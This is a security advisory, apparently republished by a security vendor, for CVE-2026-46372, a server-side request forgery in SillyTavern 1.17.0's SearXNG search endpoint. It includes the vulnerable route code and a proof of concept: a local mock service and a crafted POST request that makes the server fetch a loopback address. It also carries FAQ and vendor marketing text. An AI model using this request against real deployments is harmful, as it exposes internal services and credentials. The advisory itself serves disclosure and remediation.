Summary
Resolution
SillyTavern 1.18.0 added a generic server-side request filter (Private Request Whitelisting). Since we expect users to use the application in a trusted environment, the filter is disabled by default, however it is strongly advised to be enabled and properly configured when an instance is being hosted over a network, as suggested by a console warning message and an officially published security checklist for administrators.
Documentation:
- https://docs.sillytavern.app/administration/config-yaml/#private-address-whitelisting
- https://docs.sillytavern.app/administration/#security-checklist
Note on future SSRF findings
Since the request filter applies to the entire application, no SSRF vulnerabilities against individual endpoints will be accepted, unless it has been proven that a properly configured and enabled filter can be bypassed in an undocumented way. Only advisories disclosed before the 1.18.0 release will be posted if their concern is SSRF.
SillyTavern 1.17.0 exposes /api/search/searxng, which accepts attacker-controlled baseUrl and uses it directly to build outbound server-side fetches. An authenticated low-privilege user can point baseUrl at an internal or loopback HTTP service and receive the /search response body.
Confirmed version: SillyTavern 1.17.0 from the audited source tree. Broader affected versions and patched versions should be confirmed by the maintainer.
Details
The /api/search/searxng route in src/endpoints/search.js reads baseUrl from request.body and performs no allowlist, IP range, DNS, or scheme validation before making outbound requests.
Core vulnerable path:
router.post('/searxng', async (request, response) => {
const { baseUrl, query, preferences, categories } = request.body;
if (!baseUrl || !query) {
return response.status(400).send('Missing required parameters');
}
const mainPageUrl = new URL(baseUrl);
const mainPageRequest = await fetch(mainPageUrl, { headers: visitHeaders });
...
const searchUrl = new URL('/search', baseUrl);
const searchParams = new URLSearchParams();
searchParams.append('q', query);
...
const searchResult = await fetch(searchUrl, { headers: visitHeaders });
...
const data = await searchResult.text();
return response.send(data);
});
src/server-startup.js mounts this router at /api/search, and src/server-main.js applies login middleware before the API routes. This means the source is a remote authenticated POST request and the sink is server-side fetch() to attacker-selected hosts.
PoC
Attacker prerequisites: a valid SillyTavern web session, or access to a deployment where user accounts are disabled.
Start an internal mock service on the target host:
import http from 'node:http';
http.createServer((req, res) => {
if (req.url === '/') {
res.writeHead(200, { 'Content-Type': 'text/html' });
return res.end('<html><head><link href="/client.css" rel="stylesheet"></head></html>');
}
if (req.url === '/client.css') {
res.writeHead(200, { 'Content-Type': 'text/css' });
return res.end('body{}');
}
if (req.url.startsWith('/search?q=')) {
res.writeHead(200, { 'Content-Type': 'text/plain' });
return res.end('INTERNAL-SEARCH-RESULT');
}
res.writeHead(404);
res.end('not found');
}).listen(9091, '127.0.0.1');
Then send:
POST /api/search/searxng HTTP/1.1
Host: TARGET:8000
Cookie: session-...=...
X-CSRF-Token: <token from /csrf-token>
Content-Type: application/json
{"baseUrl":"http://127.0.0.1:9091/","query":"x"}
Result based on the route logic: SillyTavern first fetches http://127.0.0.1:9091/, then fetches http://127.0.0.1:9091/search?q=x, and returns INTERNAL-SEARCH-RESULT to the attacker.
Impact
This is an authenticated SSRF primitive with arbitrary host and port selection. It can disclose responses from loopback or internal HTTP services reachable from the SillyTavern host and may enable interaction with internal admin panels, development services, cloud metadata endpoints in applicable deployments, or service discovery across private networks.
Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.
CVE-2026-46372 has a CVSS score of 8.5 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.18.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-46372? CVE-2026-46372 is a high-severity server-side request forgery (SSRF) vulnerability in sillytavern (npm), affecting versions <= 1.17.0. It is fixed in 1.18.0. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
- How severe is CVE-2026-46372? CVE-2026-46372 has a CVSS score of 8.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of sillytavern are affected by CVE-2026-46372? sillytavern (npm) versions <= 1.17.0 is affected.
- Is there a fix for CVE-2026-46372? Yes. CVE-2026-46372 is fixed in 1.18.0. Upgrade to this version or later.
- Is CVE-2026-46372 exploitable, and should I be worried? Whether CVE-2026-46372 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-46372 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-46372? Upgrade
sillytavernto 1.18.0 or later.